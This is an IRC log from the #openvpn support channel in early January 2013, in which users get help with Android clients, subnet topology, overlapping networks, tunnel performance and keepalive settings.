10:17 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn 10:17 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has left #openvpn [] 10:17 < dvl-_> OK, heading over to EFNET for some ports work... 10:17 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has quit [Quit: Killed (einride (Requested by panasync))] 10:21 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has joined #openvpn 10:21 -!- master_of_master [~master_of@p57B556D3.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 10:23 -!- master_of_master [~master_of@p57B54F45.dip.t-dialin.net] has joined #openvpn 10:27 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 10:36 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has joined #openvpn 10:47 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 11:03 -!- raidz_away is now known as raidz 11:12 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has quit [] 11:15 -!- ade_b [~Ade@koln-5d817780.pool.mediaWays.net] has joined #openvpn 11:15 -!- ade_b [~Ade@koln-5d817780.pool.mediaWays.net] has quit [Changing host] 11:15 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:19 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:21 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 11:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:24 -!- mode/#openvpn [+o krzee] by ChanServ 11:35 -!- Rolybrau [noident@unaffiliated/rolybrau] has joined #openvpn 11:43 -!- Rolybrau [noident@unaffiliated/rolybrau] has quit [Quit: Rolybrau] 11:57 -!- naquad [~naquad@82.146.43.183] has left #openvpn ["Ухожу я от вас"] 12:00 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn 12:10 -!- torkelatgenet [~torkelatg@38.84-234-168.customer.lyse.net] has joined #openvpn 12:11 < torkelatgenet> Hello, i am trying to configure an openvpn client on my android, how should i do that? 12:11 < torkelatgenet> should i post my server config? 12:15 <@krzee> !android 12:15 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the 12:15 <@vpnHelper> market 12:25 < torkelatgenet> ! 12:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 12:31 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 12:58 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 13:20 <@dazo> torkelatgenet: if you already got a working config for a computer ... you basically just need to dump the config and additional files to the SD storage and can import it from there 13:20 <@dazo> iirc 13:20 <@krzee> ^^ yep 13:42 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 13:43 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 244 seconds] 13:49 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 13:50 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 14:11 < videl> Do you guys happen to have a documentation or a lesson on TCP/IP Routing ? I found one on Google, but wondered if you guys use a special one 14:11 <+pekster> !tcpip 14:11 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 14:11 < videl> Ah, thanks 14:17 -!- brute11k [~brute11k@89.249.230.141] has quit [Ping timeout: 260 seconds] 14:21 -!- raidz is now known as raidz_away 14:23 -!- raidz_away is now known as raidz 14:38 -!- i7c [~i7c@212.47.190.111] has joined #openvpn 14:38 < i7c> what to use, easy-rsa 1.0 or 2.0? 14:42 <@krzee> 2.0 14:42 <@krzee> !easy-rsa 14:42 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from git hub at https://github.com/OpenVPN/easy-rsa 14:43 < i7c> thx 14:48 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has quit [Ping timeout: 248 seconds] 14:49 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has joined #openvpn 14:54 <@ecrist> 2.0 14:54 <@ecrist> or, ssl-admin 14:54 <@ecrist> new version released today 14:54 -!- d1gital [~d1gital@fsf/member/d1gital] has joined #openvpn 14:55 < d1gital> what do the W's in the output mean at verb 5? 14:57 <@dazo> d1gital: that a write operation is happening on either the tun/tap device or the TCP/UDP socket ... All 'w' are the "other" socket (TCP/UDP or tun/tap) ... but I always forget and mix which is which 14:57 <@dazo> d1gital: it's the same with R/r too 14:58 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 15:00 -!- dazo is now known as dazo_afk 15:00 < d1gital> dazo: I see. 15:01 < d1gital> Only my client reports "Initialization sequence completed", and my server does not. 15:01 < d1gital> after that, the client says "Invalid argument (code=22)", and the server just prints some W's 15:11 <@plaisthos> d1gital: educated guess,dev tun vs dev tap 15:15 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 15:18 -!- ade_b [~Ade@koln-5d817780.pool.mediaWays.net] has joined #openvpn 15:18 -!- ade_b [~Ade@koln-5d817780.pool.mediaWays.net] has quit [Changing host] 15:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:30 < i7c> how to prevent openvpn from doing that double-ip thingy? my clients all have an ip and a "destination"... i think that was something necessary on windows 15:30 < i7c> i dont want it tho 15:30 < ngharo> !topology 15:30 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 15:31 < ngharo> so you want 'topology subnet' 15:31 < ngharo> instead of the /30 15:31 < ngharo> !/30 15:31 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 15:31 < i7c> will read, thanks 15:34 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:36 -!- MeanderingCode [~Meanderin@199.254.238.250] has joined #openvpn 15:49 < i7c> is there an option to "push nothing" to the client? so that i can freely configure my routing table manually? 15:49 <+rob0> uh ... don't use "push" on the server side if you want to push nothing 15:50 <+rob0> you might also be interested in: 15:50 <+rob0> --route_nopull 15:51 < i7c> might be what i'm looking for. i dont use push at all but it still adds the default routes for the tun device 15:51 < i7c> which is no problem but i like it clean ;) 15:56 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 15:56 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 15:56 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:56 -!- mode/#openvpn [+o krzee] by ChanServ 16:08 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 16:09 <+EugeneKay> ecrist mattock - who is paying for the shirts, anyway? Just donation slush fund? 16:20 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Quit: Ex-Chat] 16:21 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:21 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 16:29 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:39 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 16:54 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Quit: Ex-Chat] 17:12 -!- torkelatgenet [~torkelatg@38.84-234-168.customer.lyse.net] has quit [Ping timeout: 272 seconds] 17:22 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 17:22 -!- mode/#openvpn [+v s7r] by ChanServ 17:30 -!- d1gital [~d1gital@fsf/member/d1gital] has quit [Quit: Lost terminal] 17:31 -!- MeanderingCode [~Meanderin@199.254.238.250] has quit [Ping timeout: 276 seconds] 17:38 -!- liviusfuscus [~liviusfus@79.118.217.119] has joined #openvpn 17:39 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 264 seconds] 17:52 -!- liviusfuscus [~liviusfus@79.118.217.119] has quit [Ping timeout: 276 seconds] 17:52 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 264 seconds] 17:58 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 18:00 -!- MeanderingCode [~Meanderin@c-68-84-147-239.hsd1.nm.comcast.net] has joined #openvpn 18:09 -!- MeanderingCode_ [~Meanderin@97-123-172-69.albq.qwest.net] has joined #openvpn 18:09 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:10 -!- MeanderingCode [~Meanderin@c-68-84-147-239.hsd1.nm.comcast.net] has quit [Ping timeout: 240 seconds] 18:24 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:28 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 18:36 -!- HyperGlide [~HyperGlid@222.211.121.189] has joined #openvpn 18:39 -!- Denial [Denial@92.239.45.77] has quit [] 18:40 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 18:41 -!- HyperGlide [~HyperGlid@222.211.121.189] has quit [Ping timeout: 252 seconds] 18:45 -!- Yawa is now known as F^4 19:01 -!- MeanderingCode_ [~Meanderin@97-123-172-69.albq.qwest.net] has quit [Ping timeout: 276 seconds] 19:05 -!- HyperGlide [~HyperGlid@182.151.60.13] has joined #openvpn 19:13 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 252 seconds] 19:22 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Ping timeout: 276 seconds] 19:29 -!- chrisb [~chrisb@c-71-224-139-141.hsd1.nj.comcast.net] has joined #openvpn 19:34 -!- chrisb [~chrisb@c-71-224-139-141.hsd1.nj.comcast.net] has quit [Ping timeout: 260 seconds] 19:50 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:53 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 20:13 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 248 seconds] 20:23 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has joined #openvpn 20:27 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 20:38 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has joined #openvpn 20:39 < plut0> this the correct channel for adito support? 20:43 -!- kloeri_ [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 20:43 -!- videl_ [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 20:44 -!- Netsplit *.net <-> *.split quits: kloeri, cm_, chrisb, Saviq, videl 20:47 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 20:48 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has quit [Ping timeout: 252 seconds] 20:50 < plut0> anyone? 20:55 < chrisb> yes? 20:56 < plut0> this the correct channel for adito support? 20:57 < chrisb> plut0: ? openvpn 21:00 < plut0> this differ from openvpn-als? 21:01 <+EugeneKay> !as 21:01 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 21:01 <+rob0> openvpn-als? is that Lou Gehrig's openvpn? 21:02 < plut0> http://sourceforge.net/projects/openvpn-als/ 21:02 <@vpnHelper> Title: OpenVPN ALS | Free software downloads at SourceForge.net (at sourceforge.net) 21:03 < plut0> am i in the wrong place? 21:08 <+rob0> If mattock is the same one as from OpenVPN ALS, you're probably in the right place. 21:08 <+rob0> but I know nothing about OpenVPN ALS 21:08 < plut0> mattock? 21:14 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 21:20 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 21:30 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 21:48 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has left #openvpn [] 22:26 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:26 -!- mode/#openvpn [+o krzee] by ChanServ 22:30 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 22:33 <+pekster> i7c: You might also look at --route-noexec which doesn't add any routes and passes them as env-vars to a script defined by --route-up. Using subnet topology you need the local subnet as a route to simply reach the peer or other clients on the network 23:21 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has joined #openvpn 23:31 -!- amir_ [~amir@unaffiliated/amir] has quit [Ping timeout: 246 seconds] 23:34 -!- amir_ [~amir@unaffiliated/amir] has joined #openvpn 23:39 -!- amir_ [~amir@unaffiliated/amir] has quit [Ping timeout: 248 seconds] --- Day changed Fri Jan 04 2013 00:08 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 00:10 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 00:14 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 00:20 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 00:29 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Ping timeout: 240 seconds] 00:31 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Ping timeout: 265 seconds] 00:32 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 276 seconds] 00:33 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection] 00:33 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 00:34 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 00:45 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 00:58 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 01:06 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 252 seconds] 01:12 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 01:22 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 01:23 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer] 01:37 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 272 seconds] 01:39 -!- Devastator [~devas@186.214.111.210] has joined #openvpn 01:51 -!- Devastator [~devas@186.214.111.210] has quit [Changing host] 01:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 02:01 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: Leaving] 02:33 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 02:34 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Quit: leaving] 02:38 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 02:50 -!- mattock is now known as mattock_afk 03:01 -!- mattock_afk is now known as mattock 03:05 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 03:05 -!- thumbs [1000@unaffiliated/thumbs] has quit [Ping timeout: 244 seconds] 03:05 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 244 seconds] 03:05 -!- kirin` [telex@gateway/shell/anapnea.net/x-vxqssktuziclmllz] has quit [Ping timeout: 244 seconds] 03:06 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 244 seconds] 03:06 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 03:06 -!- thumbs [1000@unaffiliated/thumbs] has joined #openvpn 03:06 -!- kirin` [telex@gateway/shell/anapnea.net/x-wmccxjlvwnkhvera] has joined #openvpn 03:06 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 03:10 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Quit: leaving] 03:11 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:22 -!- brute11k [~brute11k@89.249.235.177] has joined #openvpn 03:45 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds] 03:54 -!- m0sphere` [~m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Read error: Connection reset by peer] 03:55 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 03:55 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has quit [Read error: Operation timed out] 03:58 -!- ag4ve [~ag4ve@96.26.67.194] has joined #openvpn 03:59 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has quit [Ping timeout: 276 seconds] 04:00 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has joined #openvpn 04:07 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds] 04:18 -!- kloeri_ is now known as kloeri 04:19 -!- ag4ve [~ag4ve@96.26.67.194] has joined #openvpn 04:33 -!- Saviq [~Saviq@sawicz.net] has quit [Changing host] 04:33 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 04:40 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection timed out] 04:58 -!- HyperGlide [~HyperGlid@182.151.60.13] has quit [Remote host closed the connection] 04:58 -!- ade_b [~Ade@koln-4d0b0cf7.pool.mediaWays.net] has joined #openvpn 04:58 -!- ade_b [~Ade@koln-4d0b0cf7.pool.mediaWays.net] has quit [Changing host] 04:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:04 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 05:12 -!- pie___ [~pie_@84-236-109-204.pool.digikabel.hu] has joined #openvpn 05:12 -!- pie___ [~pie_@84-236-109-204.pool.digikabel.hu] has quit [Changing host] 05:12 -!- pie___ [~pie_@unaffiliated/pie-/x-0787662] has joined #openvpn 05:16 -!- pie__ [~pie_@unaffiliated/pie-/x-0787662] has quit [Ping timeout: 264 seconds] 05:24 -!- dazo_afk is now known as dazo 05:31 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 05:43 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 05:49 < Cpt-Oblivious> I got 2 networks. Both 192.168.1.x, on 1 of them I run OpenVPN, and it has 10.248.12.1 as gateway ip and hands out 10.248.12.x ip addresses. How would i get other PC's on the 192.168.1.x network of the server to be accessible for the clients that get dealt the 10.248.12.x ip addresses? I tried giving the pc's on the server side lan another IP address like 10.248.12.50 for example. But that 05:49 < Cpt-Oblivious> doesn't work. What route or something should i push to the clients / place in my server config? 06:00 <@plaisthos> You should avoid some subnet 06:01 <@plaisthos> for 2.3 you can look into client-nat 06:01 <@plaisthos> !samenetwork 06:03 <@plaisthos> !samesubnet 06:03 <@vpnHelper> "samesubnet" is (#1) clients can not connect to a server pushing its lan if on the same subnet. you can only reach your subnet on layer2 or through your gateway, when you create a route for it you will try to reach your gateway over the vpn which dies because you cant reach your gateway or (#2) you can use --client-nat if on 2.3 to work around changing the subnet, but you should still just change 06:03 <@vpnHelper> the subnet 06:05 < Cpt-Oblivious> Hmm 06:06 <@plaisthos> otherwise you need nat/routing rules which in most cases give more headaches then renumbering 06:06 <@plaisthos> especially since that often leads to subtile errors 06:07 < Cpt-Oblivious> I currently also have a RAS pptp vpn running. And with that I just assigned all servers in the 192.168.1.x LAN also a 10.248.11.x ip address 06:07 < Cpt-Oblivious> And that's pingable 06:07 < Cpt-Oblivious> but a friend configured that mostly, so i'm not sure if it's natting. Let's see. 06:08 < Cpt-Oblivious> Can't you just have OpenVPN act as a router for 10.248.12.x? 06:08 <@plaisthos> sure 06:08 < Cpt-Oblivious> And that if other pc's in the 192.168.1.x subnet want to connect, you can just use 10.248.12.1 as gateway for them and 10.248.something as their ip address? 06:09 <@plaisthos> but openvpn does not do the routing the computer on which openvpn runs has to do the routing 06:09 < Cpt-Oblivious> like assign that as second static ip address? 06:10 < Cpt-Oblivious> Hmmm 06:12 < Cpt-Oblivious> Can't I add like a rule on my router, that if anything in the subnet wants to reach a 10.248.12.x address, that they have to go to 10.248.12.1 which is the OpenVPN server? 06:12 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:12 < Cpt-Oblivious> And doesn't the OpenVPN server then forward it to it's clients? 06:13 <@plaisthos> yes sure 06:13 < Cpt-Oblivious> So if I'd add a rule that says 10.248.12.x -> 10.248.12.1 06:13 < Cpt-Oblivious> then i'd work? 06:13 <@plaisthos> openvpn forward to it clients whatever enters the tun device 06:14 <@plaisthos> if you give out 10.248.12.0/24 to your clients openvpn expects all of these ips to be clients 06:16 < Cpt-Oblivious> Ooh i didn't, i gave like 30 ip's to clients 06:19 <@plaisthos> You have an OpenVPN network like 10.248.12.0/27 and a normal network like 10.248.12.0/24 and are wondering why it does not work? 06:20 < Cpt-Oblivious> Uhh 06:20 < Cpt-Oblivious> I got a 192.168.1.x network 06:20 < Cpt-Oblivious> On which all servers connect to get internet 06:20 < Cpt-Oblivious> 1 of those servers, 192.168.1.146 is the OpenVPN server 06:20 < Cpt-Oblivious> The OpenVPN server has 10.248.12.1 as IP address 06:21 < Cpt-Oblivious> And gives clients IP addresses like 10.248.12.6 or 10.248.12.10 06:21 < Cpt-Oblivious> other servers on that 192.168.1.x network, like 192.168.1.141, i tried giving them also an address like 10.248.12.50, and I want clients to be able to reach that. 06:22 <@plaisthos> yeah, like I said :) 06:22 <@plaisthos> you have two different 10.248.12.0 networks 06:22 <@plaisthos> one of openvpn and one in your lan 06:22 < Cpt-Oblivious> I guess? 06:23 <@plaisthos> You should read more about routing, but for starters change one of the networks and a route for other network on both sides 06:24 < Cpt-Oblivious> I guess the part that got me confused is that I do like the exact same thing with RAS. I give clients 10.248.11.2 addresses for example, server is 10.248.11.1, and I also added 10.248.11.50 addresses as second IP on other servers. And that works 06:26 <@plaisthos> yes ras works different 06:26 <@plaisthos> ras is like a mix of tun and tap iirc 06:26 -!- mape2k-mobil [~mape2k-3@i59F78894.versanet.de] has joined #openvpn 06:26 < Cpt-Oblivious> Yea looks like that 06:33 < Cpt-Oblivious> Thanks for your advice though. I think i'm going to change the subnet serverside first. Sounds like the least painfull solution. 06:36 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 245 seconds] 06:48 -!- mape2k-mobil [~mape2k-3@i59F78894.versanet.de] has quit [Quit: Leaving] 06:48 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 06:59 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 252 seconds] 07:00 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 07:01 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 07:06 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 07:07 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 08:04 < i7c> how come my openvpn has such a bad performance compared to a ssh tunnel? it happens quite some time that the latency goes up (i open a web page and it takes like 20 seconds until i get response) also speedtests are worse. 08:04 < i7c> i use udp and no compression. 08:06 < i7c> also i noticed the server has a very high cpu usage (~60%) while the client has like 2%... ok different CPUs but still 08:12 <@dazo> i7c: depends on firewalling, routing, DNS, and if your ISPs on both server and client side have good performance over UDP ... basically your complete configuration setup .... for me VPN and SSH tunnels does not have any difference at all 08:13 < i7c> dazo: so could it even be that tcp has better performance? 08:15 <@dazo> i7c: in some cases, some ISPs really cripple UDP traffic 08:16 < i7c> oh ok. i will test this. also i could really need some tools for testing my servers network performance 08:16 <@dazo> i7c: iperf is pretty decent for that 08:16 < i7c> thanks! i'll check it out 08:16 <@dazo> it can test udp and tcp ... and you can then test it outside and inside the tunnel ... to see if it's your connection or vpn setup 08:17 <@dazo> which is troubling you 08:17 * dazo heads out for a while 08:17 < i7c> :) 08:17 < i7c> awesome 08:17 < i7c> thanks 08:17 < i7c> till then 08:33 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 08:44 < i7c> okay so my performance in via openvpn is way worse, but udp is still better... what else could i tweak? 08:49 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 08:51 -!- Porkepix [~Porkepix@83.159.5.235] has joined #openvpn 08:59 -!- brute11k [~brute11k@89.249.235.177] has quit [Read error: Connection reset by peer] 09:08 -!- ExxKA [ExxKA@nat/google/x-yeotbtxjhaaupbng] has joined #openvpn 09:08 -!- cpm [~Chip@216.169.175.102] has joined #openvpn 09:08 -!- cpm [~Chip@216.169.175.102] has quit [Changing host] 09:08 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 09:09 < ExxKA> Hey Guys. I have a problem where my VPN connection is dropped after about 1 hour. I am using TunnelBlick. I know you are not a tunnelblick support channel but I thought you may have an idea? 09:10 <@ecrist> what's the error 09:16 -!- brute11k [~brute11k@89.249.235.177] has joined #openvpn 09:20 -!- cpm [~Chip@pdpc/supporter/active/cpm] has quit [Ping timeout: 248 seconds] 09:24 < ExxKA> ecrist, there is no error, other than traffic routed through the vpn never makes it (after the 1 hour) 09:24 < ExxKA> The connect seems to be active, but in practice it is not 09:25 < ExxKA> I have been thinking that maybe it is a timeout setting on the dns settings or routes used? 09:25 < ExxKA> Or maybe a parameter server side? To be honest I do not use the routes very often as they only lead to my git repository 09:26 < ExxKA> So it may be that it's a timeout because I have not used the connection. I would just think that the connection was still kept alive? 09:28 <@ecrist> ExxKA: what do your openvpn logs indicate? If you're using UDP for the VPN, you might be hitting a UDP state timeout on a router/firewall (yes, I know, UDP is stateless) 09:28 <@ecrist> do you have a keepalive in the openvpn configuration? 09:29 < ExxKA> Good question. Do you know where the logs reside? 09:29 <@ecrist> !logs 09:29 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 09:29 < ExxKA> !logfile 09:29 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 09:29 < ExxKA> Hmm ok 09:30 < ExxKA> No I have no keep alive setting 09:30 < ExxKA> That may be it! 09:32 < ExxKA> Nope. 09:32 < ExxKA> It seems that by default keep alive is forever 09:32 < ExxKA> or --inactive 0 :) 09:33 <@ecrist> so, you need to add a keepalive 09:33 <@ecrist> usually --keepalive 5 10 or so is more than sufficient 09:33 <@ecrist> or even 10 60 09:33 < ExxKA> can I add it to any of the lines in my configuration file? 09:34 <@ecrist> it's a new line 09:34 < ExxKA> I suppose it will just be "keepalive 10 60" on a line by itself? 09:34 <@ecrist> yup 09:34 < ExxKA> Thanks 09:34 < ExxKA> I will give it a go :) 09:37 <@dazo> i7c: You might learn a few tricks here ... https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux 09:37 <@vpnHelper> Title: Gigabit_Networks_Linux – OpenVPN Community (at community.openvpn.net) 10:21 -!- master_of_master [~master_of@p57B54F45.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:23 -!- master_of_master [~master_of@p57B52EA2.dip.t-dialin.net] has joined #openvpn 10:30 < kisom> Made my computers lock their screens when OpenVPN disconnects 10:31 <+hazardous> o_O 10:31 < kisom> It's quite nice in fact. Imagine if someone stole the machine. 10:31 < kisom> Then they wouldn't have access to my files any more. 10:33 <@ecrist> all because of a screen lock 10:34 <+hazardous> yolo 10:46 < kisom> ecrist: And full disk encryption. 11:12 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:12 -!- mode/#openvpn [+o krzee] by ChanServ 11:32 <@plaisthos> kisom: does your notebook have pcexpress card? 11:32 <@plaisthos> or thunderbolt? 11:35 <@krzee> MacBookPro CPU: Intel Core i7 M 620 2.67GHz @ 2.66GHz [SSE3/SSSE3/SSE4.1/SSE4.2/x86_64/PAE/XD/VT/EST/OctaCore] L3: 4MB QPI: 4.8 GT/s RAM: 3.2GB/8.0GB swap: 0.00M/64.00M Disk: 167.48GB/173.85GB GPU: NVIDIA GeForce GT 330M & Intel HD Graphics [512 MB & 288 MB/Stock] 1920x1200 OS: Mac OS X 10.7.5 (11G63) Kernel: 